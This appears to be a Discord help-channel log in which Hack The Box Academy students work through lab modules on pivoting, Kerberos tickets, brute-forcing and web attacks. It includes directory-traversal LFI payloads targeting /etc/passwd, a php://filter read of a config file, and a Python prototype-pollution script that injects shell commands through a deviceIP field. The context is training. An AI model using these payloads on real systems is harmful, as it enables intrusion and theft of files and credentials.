Module: Password attacks
section: Pass the ticket from Linux
Question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
So I configured my proxychains.conf to 127.0.0.1 1080 and ran chisel on the david account (RDP),
but once I try to run my wmiexec I just don't get anything. I don't understand where it takes "4.2.2.2:53" from either?
Also, I imported the julio ticket as well.
#modules
It's easier to just PtH from that Linux host IIRC; if you want to pivot you'll need to add entries to your hosts file and set KRB5CCNAME.
I did that already
What about your hosts file?
And for Impacket you should use -k -no-pass to use Kerberos auth.
Use the FQDN.
I have a question related to the Footprinting module, DNS section, question 3. It seems that the correct way to find the host is to enumerate ||dev.inlanefreight.htb||. But I don't quite get the reason behind enumerating this subdomain in particular. Or am I getting it wrong and you are supposed to brute force all subdomains discovered to find additional hosts one by one, and you would eventually come up with the right one?
If that is the case if you were to use a comprehensive list like dns-JHaddix, it would take quite a while....
Where do you mean? In proxychains? Or in my hosts? Isn't it correct there? Or am I stupid?
IDK why your proxychains is trying to look up some random DNS server.
Try the FQDN in your wmiexec.

IDK why it goes to 4.2.2.2.
It's a fresh Parrot OS install as well.
ffs
Well, I'll try with evil and rebues.
If that doesn't work I'll get ligolo and check how it works. Never worked with ligolo before.

check your proxychains config
cat /etc/proxychains.conf
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
# Make sense only if random_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
# Proxy DNS requests - no leak for DNS data
proxy_dns
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000
# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
socks5 127.0.0.1 1080
# meanwile
# defaults set to "tor"
[ProxyList]
socks5 127.0.0.1 1080
by "check your proxychains config" I meant you should check it, not me 
any ideas on this ?
just a guess based on enumeration, often d* and a* endpoints are really interesting as they often contain things that a live site might not
or even in*
I'm having a problem running any MSSQL script.
well, did you use -d to debug?
Yes, I don't know how to fix it.
your nmap's ms-sql script is having issues!
How do i fix?
hmm, seems like the script itself is throwin' that error!
just don't worry about using scripts
more than one way to enumerate an mssql server
and usually it involves authentication
okay, let me use metasploit then
Mhm!
hey, I'm currently working on the XSS module and I'm kinda stuck at the phishing section. Is there anyone who is able to help?
What part are you stuck on? What have you tried?
Well, I figured out how to get XSS. I'm now trying to follow along with the module, but now I'm stuck on getting the page to look how it should. In the module they use the functions "document.write()" and "document.getElementById().remove()" to create the fake login portal and then clean it up. But neither of those functions work for me.
hi everyone
In "Dynamic Port Forwarding with SSH and SOCKS Tunneling", for solving the second question: the proxychains tool is not on the Ubuntu server, and neither is nmap. So how to solve it?
You use proxychains from your system
Set up pivot; then from your system using nmap/proxychains
wooooh ! got it
like the diagram
I think I have to only use Ubuntu, then from there move forward.
Proxychains is used from your attack system generally
thanks mate
Once you get the major idea of how it works down, look into ligolo-ng - it combines a lot of the underlying pivoting into one tool
...
nah but seriously though... america and germany have the best cyber universities
even Britain
Doing online studies like from HTB academy will be better
classes from Heilbronn, the NSA, DoD, and more
but think about official degrees and certs especially as a russian immigrant...
still gets beaten by russian/chinese/asian
That doesn't matter
Degrees sure
oh yh i forgot about japan
but no way does russia beat america in cyber
But you don't need degrees to get certs
Sure
There's a reason some of the Big APT groups are Russian
Don't you like Russia?
And often are state-backed
but a degree from a recognized university will get this mans set up good
Not really
I do, it's not about that though my guy
Most jobs could care less what uni you studied in
ok but are HTB certs nationally recognized...?
bro
Nah don't laugh, I just started too, now I'm invested in what my best route would be.
Jump in there!
@peak rover if you link your htb account following #welcome you can access #careers-and-certs and get far more valuable input
Long story short: pick a field, get a cert and stick to it.
From people that are actually in the field
I can't do multiple thingies?
Not just a skid who thinks they know what they're talking about
Okay, I'll do it now
It's best to start narrow
Focus on one thing, then learn and expand
who you referring to hmmm
You
but mericuh
You
But no experience
He can be realistic sometimes, cope.
#careers-and-certs, well that is for a reason! Let others get some help in here!
Can you imagine if just one of those exploded in the tube. That would be a bad day.
why does that go through your head
Probably because I've seen it happen.
No one had them strapped to their arms though.
Question: Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host. The hint for the flag is "The flag is in a very common directory!" I tried many common directories but no luck.
For the miscellaneous techniques section on Windows privilege escalation, is the account in the exercise referring to a local account?
/root/ /tmp/ many places
tried but no luck.
Did you even try using find?
find / -name "flag.txt"
Did you also just try checking the filesystem root
Not able to move from /var/www/html
Module Name: SQLMap Essentials -> OS Exploitation
You don't need to be able to move to read files
I've already got SYSTEM, and checked mimikatz and secretsdump; the password hashes that I cracked don't get accepted either.
Try ls /
Here it is but how to read it?
It sounds like you don't understand linux basics
cat /path/to/file since it's in filesystem root (/) figure out from there
Also this contains a spoiler, please delete the image
I did but here's little bit confusion btw thanks.
Wdym confusion?
There's relative and absolute paths
ls on its own just lists the current directory
You can supply a filepath to have it list a specific directory
For instance if you want to list /tmp/ without cd into it, you'd just ls /tmp/
I suggest doing the linux fundamentals module
Btw still need to delete this
Got the flag btw I've already done the fundamentals.
It contains a spoiler for the other flag
Sure. i'll delete it.
Then it sounds like you don't understand how linux and commands work
I did understand it. Actually I tried with this command, cat / flag.txt; I didn't see the space.
Btw thanks.
could someone help with this
starts with ! and ends with c
is it in rockyou
no, you can find it in the system
is the password encrypted
is ligolo-ng a tool?
Yes
I noted your line in my notes
Has anyone solved Broken Authentication recently?
I am stuck.
Are we supposed to enumerate user names from Login or register then brute force the password?
yh
Is there a defacto tool for sucking down the contents of a mailbox via IMAP? What do you guys use for that? A little searching turned up some weak looking candidates or Windows-only stuff.
yeah
You can use curl I believe I forget the full syntax, I remember though it uses imap://ip though
But tbh there's not too many emails in these practice labs
Like one maybe two
The proper way to fetch an email in imap is 1 fetch 1 body[] btw
Idk why they give you the "all" command
It gives you mostly informational stuff about the email, but doesn't read it
Thanks, I'll look more into curl. I saw the commands for working with individual IMAP folders but I'm sure there's a small script to iterate if that kind of thing isn't baked in already.
Yeah, I'm seeing there's never any real email in there except the ones you're supposed to see.
Getting pretty fast at the manual navigation hah
But it'd still be nice to just suck the whole thing down and ls/grep out the important stuff. Checking all the folders available is a little bit of a drag.
Aaaand... finished with the Footprinting module. I gotta admit, the labs are a ton of fun even when I'm vexed by some mundane detail.
Network Enumeration with Nmap - Firewall and IDS/IPS Evasion - Medium Lab
Can someone help guide me in the right direction for this section, because I'm struggling with it?
Source port
Make sure you also disable a bunch of the ping stuff
keeps giving me filtered
I can't seem to get the version of the DNS server.
--source-port
Why are you setting source port that high?
I saw it in the walkthrough in the module.
Wrong section
And none of the sections use that high of a source port
Remember maybe the dns is misconfigured
What if it thinks you're dns
Also if you give it too many alerts it'll block you outright
And you'll have to reset anyway
(Or wait the like 10 minutes)
Why 143?
how can I decide what my source port is
I suggest re-reading the evasion section regarding dns
And source port
More specifically what port is dns
A misconfiguration could allow it to be scanned if the source port of the attacker comes from the "dns" port
I found a perl script for getting all the IMAP messages. It's not great but it seems to work. Weird syntax. iu-dump in particular from the linked repo.
Curl outputs to stdout and I haven't figured out how to split into separate files. Neither fetchmail nor getmail do what I want.
https://github.com/mtsatsenko/imaputils
I wonder how that works in the real world, someone's gigabyte sized inbox. Are you going to download the whole dang thing to sift for details kind of search for "passwords" or whatever and move on?
I got it!!
Generally look for things tagged "important," also in a real engagement you're looking at a corporate inbox. Not a random gmail/outlook email
Imap is good for this because inboxes can be tagged and sorted, pop3 does not
Anybody done the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
I don't know why the meterpreter session doesn't run... would appreciate some help.
Is it worth posting your modules every time you complete them to LinkedIn, like sharing/showing you've completed the labs?
out of topic but ye !
this is old but gold. thank you. helped me understand the concept
Up to you tbh
It is time to share that I have officially reached 100% completion for the CPTS. Exam time is nigh.

Congrats!!!
Any help?
Do whatever is taught by the module
I did. I just need a nudge in the right direction
The users are all available. The headers for "local auth" give nothing
I am confused
Escaping Restricted Shells in Linux privilege escalation. How to bypass rbash?
Literally everything has / in it. Nothing is working. No programming languages installed.
"no programming languages installed" I doubt that
rbash is just restricted bash so you gotta find a way around it
Damn I cant ask my question in general
read and follow #welcome to access it
Yeah, but I need to finish THM Practical Ethical Hacking first, so I just wanted to ask if it is good and what I can learn from it if I don't pay for it, since it looks like all videos are unlocked.
well this channel/server isn't really gonna give you useful answers for THM
you'd have to go to the THM discord and ask
I can't do these modules, the VMs keep dying
power through~
Hmm,
I am stuck at the OTP rn.
I bruteforced for about 2 million or something
Not a single one works
Anyone else having issues w/ targets spawning or is it just me?
Yeah mines taking abnormally long to spawn right now...
What module / region?
After I got the Gladys user it asks for an OTP. I bruteforced a lot. Nothing comes.
Any hints for the OTP part?
Are you talking about One Time Password or? Just so I understand the acronym
Also, which module is this?
Yes the one time password
Which module are you working on?
Broken Authentication
I just solved it
Nice!
Can you tell me what to do with the OTP. I did try to brute force from 0 to 999999
I dont believe I've started BA yet, even though CPTS covers a lot of Web App.
Nothing works
Ill take a look too
Any hints?
yup i had the same issue. the rate limiting is strong
It doesn't stop me. Which is weird.
How many numbers is the OTP though?
if you enter a couple otp and refresh the page you'll see you're logged out
I think I understand how to solve it as well
Yeah. But when I use burp it still works.
Like in repeater I get the invalid otp page before I am redirected.
So I just ignored it.
Burp can give you a lot of noise depending what you're doing. The example uses ffuf.
I was not able to get OTP working either.
Do I need to put the X-Forwarded-For header?
I never did the module before they changed it; I wonder what the old skills assessment was.
I tried that too. I tried scripting it to randomize the IP every time, but no matter what I did I got rate limited. And there are too many OTP codes to go through before the box dies if you do it super slow. I limited ffuf to do it 1 per second and it still logged me out due to rate limiting.
How to solve it then?
Everything you need is in the module. I can't really think of a way to say it without giving it all away.
I wasn't able to do it.
I changed parameters
I added the header
I changed methods
I don't know what more to do
Start from the beginning helps. This OTP seems p easy of an exercise. I'm working on the OTP section rn
What beginning? I am not sure I follow.
I got the user and the password
Of the module and get to the relevant section you're having issues with. Google is also your friend, but keep it in context.
Fair, but remember those times we ran into AD?
Take a moment and think about the module contents. Go review the sections. Think to yourself what other options you have if you've exhausted one resource.
Kinda the mindset I was goin with haha
As I said before, I was also not able to brute force the OTP.
I changed the method
The headers
I added parameters
The cookie looks random
K. So if you can't brute force it, go look at the sections and think about what else you can do.
Direct access?
from which module/section is that @turbid echo
I thought Python Crash Course: A Hands-On, Project-Based Introduction to Programming by Eric Matthes was really good. This isn't really the place for that though, this is about htb modules.
I totally forgot about the original landing page.
I found my starting with Python was great using Python for Everybody
Dr. Chuck is a legend.
Automate the boring stuff with python.
Remote/Reverse Port Forwarding with SSH: my brain is not able to fetch the logic. Seems very difficult. I know it's easy.
I got a problem
So I tried to run the commands for public exploits in getting started
Have you learned about subnets?
and I got the same error in two separate instances.
I did CCNA mate
rhosts and rport
yeah
So which part was confusing about reverse port forwarding
This is what it's asking me to do though.
if rport is what I need to do, then this would be misleading instructions.
yes but it didn't ask you to put the port in rhosts
You set rhost and rport separately
Rhost: remote host
Rport: remote port
I read the whole module, very easy stuff, but one thing is here that "we are using Ubuntu for the pivot to the target; we set up the listening port with localhost to forward the remote port traffic to our local port. The remote target 172.x.x.x has a connection with Ubuntu, and we just set up our localhost and port for the remote port to listen on."
Type options. It will show you if the exploit requires a port set.
You set it like you would rhosts
It depends
But how can the 172 contact our attack host? What is in between, except the pivot?
oh yeah it probably does actually
The pivot forwards the packets
I did though
How do you set the RHOST?
No you didnt
nevermind
Rhost: ip
Rport: port
you mean to and fro
They are separate options for a reason
Implied yes
It does networking magic with the packets, but nonetheless it forwards them
The content in the pivoting module is easy, but tricky. Can you suggest some other resource for easy understanding?
Look at the word before you typed "RHOSTS". Think about how you may have to set other options. Type "options" to see what options you need to configure.
No
try and see
I did
It seems you're missing some crucial info
Try to formulate your thought process into words instead of screenshots only
To attack a target, start with the most simplest thing you can think of
You're doing the getting started -- public exploits section, yes?
Get some information about the target, use that and pwn
Yes.
Then eternalblue is not the answer
Enumerate the target first before immediately jumping to what the example shows
As the example is purely that, an example of how you'd search for an exploit
Usually the docker containers are hosting a web service
http://ip:port
Ok, then the examples aren't that helpful if I don't know the correct commands to use.
Not off the top of my head
Examples won't always be spoonfeeding answers to you dude
It shows you how to search
Enumerate the target first, then search based off that info
172 contacts the Ubuntu
Remote/Reverse Port Forwarding with SSH: so here in the example the payload is copied to Windows. Is there a need to use proxychains xfreerdp to copy it to Windows?
That's not really what I'm after but what would be helpful would be a table list of commands to try out. Process of elimination.
Brother
hmm ok
Look. At. The. Target.
If you look at the web page of the target host it'll tell you basically what to search
can i dm?
Yeah but it might take me some time to respond
The target is a web-based service that I need to pwn in order to gain some intel. I get that.
The public exploit section is basically a "go to google"
How do you normally view web based content?
Html or cmd
Did you try viewing the webpage first, or just assume
go to google, look at ExploitDB or Rapid7!
if I'm looking at code
Html isn't a mode
source code
view source page?, brp
Not all source code is html
check
But I digress
You're right
Just look at it in a browser
It'll save you a good chunk of headache
Since what to search will smack you in the face
Ok when I think of link I think of the web, when I think IP address I think cmd. I know they are one in the same but my mind just seems to use IP addresses simply for debugging.
not exactly a 1:1
but still
So does anything stand out to you?
that may not work if the IP hosts multiple vhosts though
If you refer to Nibbles - Web Footprinting part of Getting Started it will show you how to find what you will want to search in Metasploit later
MarcieLee already gave him the answer a couple times
It'll generally route (if set up) to its default domain, reverse lookup is fun
There will be plenty of web modules that use the docker_ip:port btw
Wordpress 2.7.10 which if I remember right is a very buggy and exploitable version. Well most of the earlier versions were.
Sometimes they'll tell you a vhost they want you to use
Not WordPress
But the plugin
It's fairly simple
Step 0: always enumerate
Simple Backup Plugin 2.7.10
Enumeration is like 90% of this
Now go have fun with that
It's why it's step 0
Never assume you're given all the info, expect to look for more pieces to the puzzle
I'm gonna take a break
are you still there?
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN <InternalIPofPivotHost>:8080 this is on listening state on the ubuntu and 0.0.0.0:8000 this is also on the listening state on our attack host. is it correct? what about ubuntu@<ipAddressofTarget>?
ok
English is my 4th language, that's why.
I didn't say that was a bad thing
got it
?
Hi, I hope everyone is doing something productive. I am currently facing an issue while testing the LFI; kindly see below and let me know what I can do. I sent the same message to support but they take a lot of time to reply. If anyone has done this before, kindly help me with it, as my goal is not to complete the exercise but to clear up my concept.
On the "PHP filters" section of the File Inclusion module, I found the website at "http://94.237.54.176:42648/index.php?language=en"
Here "language=en" is the vulnerable target endpoint. You guys say we can read the content of PHP files without rendering them on the website using PHP filters, that is "php://filter/read=convert.base64-encode/resource=config"
But my concern is this: forget the scenario that we have to read the content of config files on the website without rendering them. I just want to know how to test the LFI on that endpoint "language=en"
In the previous exercise (which is the basic bypasses section) I tried these payloads:
../../../../../../../../../../../../../../../../etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....////....////....////....////....////....////....////....////etc/passwd
..././..././..././..././..././..././..././..././etc/passwd
..../..../..../..../..../..../..../..../etc/passwd
http://<domain>/index.php?language=languages/../../../../etc/passwd
http://<domain>/index.php?language=languages/../../../etc/passwd%00.php
And I got LFI with the help of one of the above payloads. But in the current section (which is PHP filters) our goal is to read the PHP config files' content without rendering them on the website as HTML content. But before that I want to test LFI on it, as you already say in the article that once we have found the LFI in the website, then we go with this approach of reading the content of PHP config files without rendering them.
So please give me the exact method to identify the LFI in this exercise, as I already tried the above payloads in this section, also in "URL encoded" form using Burp decoder, even double encoded.
I know how to read the file content, but I want to learn how to test LFI on this parameter, as you guys taught me the method of reading PHP config files' content without rendering them on the website, but that was the 2nd step.
Tell me the 1st step, how to identify the LFI, as I tried many methods that you guys taught me in the previous section, "basic bypasses", but they did not work for me. I even tried the payload list of directory traversal from "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory Traversal/Intruder/directory_traversal.txt" but it would not work for me.
94.237.49.212:49813
for your ease here is the target, it is up for next 1 hour
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
yes, i already did this
i got the configure.php file
i used this payload "http://94.237.49.212:49813/index.php?language=php://filter/read=convert.base64-encode/resource=configure"
but this is not my question to get the flag.
As in the Academy, they said once you identify the LFI in the application endpoint, then we will go with this approach of accessing the configuration files' content without rendering them as HTML on the website.
So when I try to test the endpoint "http://94.237.49.212:49813/index.php?language=en" for LFI, I did not get success.
Like in the real world, first we have to find the endpoint that is vulnerable to LFI, then we go for reading config files using the PHP filter "php://filter/read=convert.base64-encode/resource=file_name"
yes
ah ok then
Sorry, i did not get your point ? are you asking something from me ?
Not really, I thought language=php and language=en don't really go together.
Yes, "en" will be replaced by the PHP filter payload.
Will I be able to access the entire SOC Analyst path if I get the Student subscription?
It says all modules upto Tier 2 included
I don't know how to identify if the SOC path is tier 2 or not
If you fuzz for php files, you will see that there is an en.php and other languages as php files. A clear indicator for LFI
Yes, with the student subscription you can access all modules for the paths CBBH, CPTS and CDSA
"http://94.237.49.212:49813/index.php?language=en "
You mean in the above link we fuzz the "en" parameter with the php extension. I think they just give us files that are accessible within the current directory.
For example in this directory "/var/www/html/project/" our project is placed with files
- index.php
- es.php
- en.php
- configure.php
In index.php we define an input parameter that just accepts files from the current working directory. (I don't think that will be LFI.)
What about if I want to access the /etc/passwd file content in the "language=es" parameter? Then why will it not display the content if that was LFI?
I tried this payload
http://94.237.49.212:49813/index.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd
In the
Please correct me, I am new to LFI and just want to get my hands dirty with LFI stuff.
Because the script ensures that you can only read files within the directory. This means that you cannot read other files, such as /etc/passwd
Thank you so much, learned another technique!
Really appreciate your efforts
what academy modules are required to complete most of web challenges (tier 3)
Attacking AD
- Every windows machine no matter how many times a restart and wait 5 mins on each one, won't allow me to RDP
you are connected to RDP
you have the power to change it
I've tried resizing the screen and restarting it
simplify your approach
/relax-order-checks
sorry, I didn't think that the 'technical-issue' was actually meant to happen
Hey folks, I have a question. In my country my ISP cut the internet connection to the whole country. Is there anything to bypass it?
they should make a module to challenge mapping just like module to machines
lol wdym then what do they provide if its not internet
I've just started the Pivoting, Tunneling, and Port Forwarding module and I've gone through the sections until Remote/Reverse Port Forwarding with SSH. Could someone please correct me if my understanding of the concept is incorrect?
So, the way I understand it is that once we've compromised a host, we can check if it has any other physical/virtual NICs that have an IP address assigned, meaning that host could have access to another subnet/network.
Local port forwarding would be using SSH to listen to services that are running locally on the victim machine and make it accessible to us on our attack host.
Dynamic Port Forwarding with SSH and SOCKS would be using the SOCKS protocol to send packets to a remote network via a pivot host. Can someone please clearly explain how the SSH and SOCKS tie into this part? I have a very loose understanding of it.
So with Dynamic Port Forwarding, the SSH client requests the SSH server to allow it to send TCP data over the SSH connection and the SSH client listens on port a port of our choice that we specify in the command, for example:
ssh -D 9050 <hostname>@<ip_addr>
And then we basically use proxychains to send the commands we want to run on the pivot host?
In the section, it specifies that proxychains is capable of redirecting TCP connections through TOR, SOCKS, and HTTP/HTTPS proxy servers and also allows us to chain multiple proxy servers together. So this means that a SOCKS service is installed on the pivot host?
So in an actual engagement would I need to install the SOCKS service before being able to pivot?
Pretty much correct, except that SSH supports SOCKS by default so there's no need for extra config.
Alrighty, but then is it not possible to pivot without SSH? Maybe the answer to this question is already in the module and my question is premature
there are other ways to pivot besides SSH, some of them are covered in the module
I'd also recommend looking into ligolo-ng
Oh, okay. Thanks for letting me know. Also, in the section I'm currently reading (Meterpreter Tunneling and Port Forwarding) it states the following:
Note: Depending on the version the SOCKS server is running, we may occasionally need to change socks4 to socks5 in proxychains.conf.
Is there a way to tell from the pivot host whether to use socks4 or socks5? Also, the meterpreter method uses a version socks4a, how is that different?
Alrighty, I'll definitely have a look into it. Is it not covered in the module?
that tool is not, but it's my go to pivoting tool
the versions default to different ports so that's one way to tell, but for the most part it wouldn't make much of a difference in the tunnel
Hello there, I am actually doing the Password Attacks module and I am at the Windows local password attacks. I have to attack SAM but unfortunately it's lagging like hell; I am getting disconnected from freerdp and I can barely do anything when I am connected to it. Any hint welcome. I have to go but I'll read it later on, if someone has already gone through this.
Default to different ports? So you mean after running that SSH command I'd have to do netstat -lanpt and check which port the pivot host is listening on if I wanna figure out the version?
you can specify the version in your proxychains.conf
So basically I can just always specify socks4 and if that doesn't work, then socks 5?
yep
did you fix the issue 
Reinstalled
And it still threw me to 4.2.2.2
Then gave up for the day
Will do today. From what I've seen most ppl here prefer ligolo.
it's based

I got across the Linux local password attack section under the PASSWORD ATTACKS module. After I was stuck getting into the system I used the HINT option, yet the credentials there didn't work, nor the pw-attack file provided in the module resources, and yes I used the mutated passwords too!
User k*** pwd: L*Y1 won't work for me!
change vpn servers
iirc mutate that pass with the rule and brute it
I did that with the custom rule
yeah did you try to brute force with the list?
Can anyone help me hack a game?
Sure, with hydra and cme
Original list and the mutation list
which user is it for?
Also tried attacking the smb ftp services
from my notes the mutated list will have the password
don't use - - force in your hashcat command
Which section? I can double check too
Let me try with a diff list!
Thanks
create the list by mutating this pass btw
Password attack
Linux local password attack - credential hunting in Linux
Yep, like xreous said. A mutated list from the L ...Y .....1
@next bronze hi

Hey, they cut it because of the bacheloria degree,
Anybody who has completed Broken Authentication skill assessment (updated version)
target machine always takes a long time to spawn; also it's sometimes "host not reachable"
Sorry, just wanted to clarify something. What's happening in the dynamic port forwarding is that I'm choosing the port for the attack host to communicate with port 22 on the pivot host, right?
And in this screenshot, it's communicating with a target machine on a remote network via a pivot host from attacker host port 3300 to the target machine's port 3389?
I don't understand why the term "relay" is used here. It's got me confused
Hey has anyone done the Web Attacks Advanced File Disclosure module?
yes to both, there's a little more to it for the first question but it doesn't matter
it's just the pivot host is relaying/forwarding packets to the target
A little more to it? I'd like to understand if you're willing to explain
Ahh, okay, I thought there may some sort of internal loopback or smtg maybe.
the OS chooses a dynamic port to connect to the SSH server on the target, the -D port you're configuring is where the SOCKS server is listening to forward the traffic, the SSH tunnel is already established at that point
Can someone pls tell what all should be done before accessing the tor
(( safely access it....))
-D specifies where the server (aka the pivot host) is listening? I thought it specified where the attack host was listening?
SSH server vs SOCKS server
SSH server is running on the pivot, it is listening to incoming connection, SOCKS server starts on your own host, it is listening for packets to forward to the target
told you that you didn't need to know this
Hi guys, could you tell me the answer to the question in the module: 'Date SIEM Visualization Example 4: Users Added Or Removed From A Local Group'? I added a timestamp as a row for end results, but still no date is matching
bro today I'm also on the same module section. I'm stuck on clearing the concepts; I saw videos on YouTube and cleared the concept, but when I came back and read the section again it's wiped out.
@next bronze thats why i ping you
am thinking from last 2.5 hours
what to do how to do
content is easy
but too tricky
see
there should be videos for this module
So it's basically like this if we try using RDP on a target that's on a directly unreachable network.
SSH:
Attack host sends the RDP connection request via the port you chose on the attacker's machine to port 22 on the pivot machine and then to 3389 on the target machine.
SOCKS:
Sends RDP request to the configured port locally, so it starts on a random port (5555) and then goes to the SOCKS port you chose (3300) and then from there leaves the localhost to the pivot host and onto the target machine? If this is correct, this means it doesn't go to destination port 22 on the pivot host when not used with SSH?
Or am I wrong?
Wow
I'm able to answer the end-of-section questions so far since I know how to use the commands, I just want to understand the theory behind how it works.
woooo! same here
i think you are my replicated version lol
did the same
for the purpose of understanding dynamic pivoting with SSH, you just need to know SOCKS over SSH will listen on a port -D which will forward the packets of programs running through proxychains
Got it, so all I need to know is SOCKS is used over SSH, basically tunnelled inside SSH? Is that safe to say?
correct
hmm
yeah, reverse shell with a reverse tunnel
Having internet connection troubles
read the module and understand it, @normal sand got it so can you
@next bronze this is what I mentioned earlier right? About the service having its own port and then sending it to another local port (of my choice) to be forwarded to the pivot?
Also, sorry, I hope it's alright I pinged you
yes in this case traffic from local:3300 will be forwarded to remote:3389
Thanks!
Is this a mistake? Cuz it doesn't show local port forward with metasploit on this page? It just shows regular port forwarding/dynamic port forwarding. Not sure if the term I've used is right.
https://academy.hackthebox.com/module/158/section/1428
local port forward is regular port forward
is there a module -> challenge mapping anywhere in external sources or in htb
Oh okay. I was confused because under the section, Dynamic Port Forwarding with SSH and SOCKS Tunneling, it has a section on local port forwarding where it shows an example of how to access a local mysql service on a target host. This was before they introduced how to access a machine on a different network using a pivot host. So I thought that when a pivot host is used to access another machine, it's called "Dynamic Port Forwarding" and when it's only accessing a local service on a target machine, it's called "Local Port Forwarding". So I was wrong in that assumption, yeah?
rule of thumb is that if you're using proxychains, it's dynamic port forwarding, if your port forward only opens 1 port, it's local/regular port forwarding
on the skills assessment for windows privilege escalation part i, is the seimpersonateprivilege on the foothold user a rabbit hole
What do you mean by opens only 1 port? Would that be the example of accessing a local mysql service on a target host that is directly accessible? Or would it be accessing a target machine via exactly 1 pivot host?
that means you're only reaching one port through the tunnel, it can be reaching a localhost mysql or a rdp on a remote host
no
it is exploitable
Ah okay, so both the cases I gave are applicable. Essentially if you're accessing more than one additional port (I'm including the one used for communication), then it's dynamic.
yeah
thats right
When we say one port, we're referring to non-local host ports, yeah?
@next bronze
i guess no
That doesn't sound right...? I've no clue
doesn't matter where the target port is open at
local: L.I:L.P:R.I:R.P, what ever comes on L.I ip on L.P port, forward it to R.I ip on R.P port
basically as I've said, rule of thumb is that if you're using proxychains, it's dynamic port forwarding, anything else is just regular port forwarding
Okay, understood, I hadn't read it properly before. Thanks for reiterating and all your help.
both are technically tunnels, just that dynamic, as the name suggests, you can reach multiple ports/targets through it
@next bronze buddy is
genius
dynamic means like changing
dynamic means we can forward any port, meaning we can access any port; in local and remote, only one port
Module - Footprinting, Lab - easy. I was able to find the ssh private key by authenticating to ftp with credentials provided in the lab, why does the solution ask to perform zone transfer, then subdomain brute force of internal domain? im confused
@normal sand SOCKS Client and Server:
SOCKS Client: This is your local machine (or any tool on it) that wants to access a network or service it can't reach directly.
SOCKS Server: This is the Ubuntu server you're connecting to via SSH, which will act as a middleman to forward your traffic.
Establishing the Connection:
You use SSH to create a tunnel between your local machine and the Ubuntu server. This tunnel acts like a pipeline for your network traffic.
On your local machine, you set up a SOCKS proxy. This proxy listens for traffic and forwards it through the SSH tunnel to the Ubuntu server.
Routing the Traffic:
When your local machine (the SOCKS client) needs to access a service or network, it sends the traffic to the SOCKS proxy.
The SOCKS proxy then sends this traffic through the SSH tunnel to the Ubuntu server.
The Ubuntu server forwards the traffic to the final destination on your behalf.
The responses from the destination are sent back through the same route, returning to your local machine.
Summary in Simple Terms
You (client): Want to access a remote network.
Ubuntu server (SOCKS server): Helps you reach the remote network.
SOCKS proxy: A special setup on your machine that sends your requests to the Ubuntu server.
Traffic flow: Your requests -> SOCKS proxy -> SSH tunnel -> Ubuntu server -> Remote network.
read it mate now mine concepts are being clear
can i dm?
sure
For Padding Oracle Attacks how do u determin block size?
or is it just a random guess
Under HTTPS/TLS ATTACKS module
Hi I'm trying to do the AttackFTP from Attacking Common Services, but there's no FTP service. I restarted the target host many times and always waited some minutes before trying to scan it, but nothing till now. May I ask for some suggestions?
did you check unusual ports
there has to be one can you show your nmap output
you brought me luck! At the 10th attempt something showed on an unusual port
can anyone help me with prototype pollution RCE exercise
can anyone explain why im not being able to update the polluted attribute
||smb: > ls
. D 0 Wed Nov 10 11:12:22 2021
.. D 0 Wed Nov 10 11:12:22 2021
important.txt A 16 Wed Nov 10 11:12:55 2021
10328063 blocks of size 4096. 6101346 blocks available
smb: > get important.txt
Error opening local file important.txt||
I am trying to get a file from the share, I am not able to get it right. I checked the solutions, they did the same, but I'm getting the error, could not find something relevant on google. any ideas?
If you're working in the NFS directory created earlier, remember to change it.
Anyone got any tips for taking notes while doing the modules?
Feels like I am just copy and pasting most of the stuff until the challenge questions where I will make my own notes for the specific task.
Maybe copy and paste stuff then go back and revise it/summarize into my own words after?
can anyone help me with prototype pollution RCE exercise
```python
import requests

url = 'http://94.237.63.224:43887'
headers = {
    "Content-Type": "application/json"
}

# register a test account
requests.post(f"{url}/register", json={
    "username": "test",
    "password": "test"
}, headers=headers)

# login and reuse the session cookie for the following requests
headers["Cookie"] = requests.post(f"{url}/login", json={
    "username": "test",
    "password": "test"
}, headers=headers).headers['Set-Cookie']

# prototype pollution 1
requests.post(f"{url}/update", json={
    "constructor": {
        "prototype": {
            "deviceIP": "127.0.0.1; cat /flag.txt"
        }
    }
}, headers=headers)

# get flag
print(requests.get(f"{url}/ping", headers=headers).text)

# prototype pollution 2
requests.post(f"{url}/update", json={
    "constructor": {
        "prototype": {
            "deviceIP": "127.0.0.1; whoami"
        }
    }
}, headers=headers)

# another command
print(requests.get(f"{url}/ping", headers=headers).text)  # problem here: shows flag again, not the new result
```
I have a question. Let's say all the hosts are Windows, attack host, pivot host and internal host. SSH is not enabled on the internal host. Now I want to perform dynamic port forwarding on the pivot host. How can I do that?
why does the second time pollution doesnt work
use other tools, chisel or ligolo
Chisel also works with SSH tunnel under the hood, isn't it?
this is confusing
why is userObject.deviceIP not changed
userObject is an instance of User class
it creates a socks tunnel
if you're using the dynamic tunnel option
oh the first payload is stored in db and recovered so it has high precedence
how can i avoid this and run multiple payloads
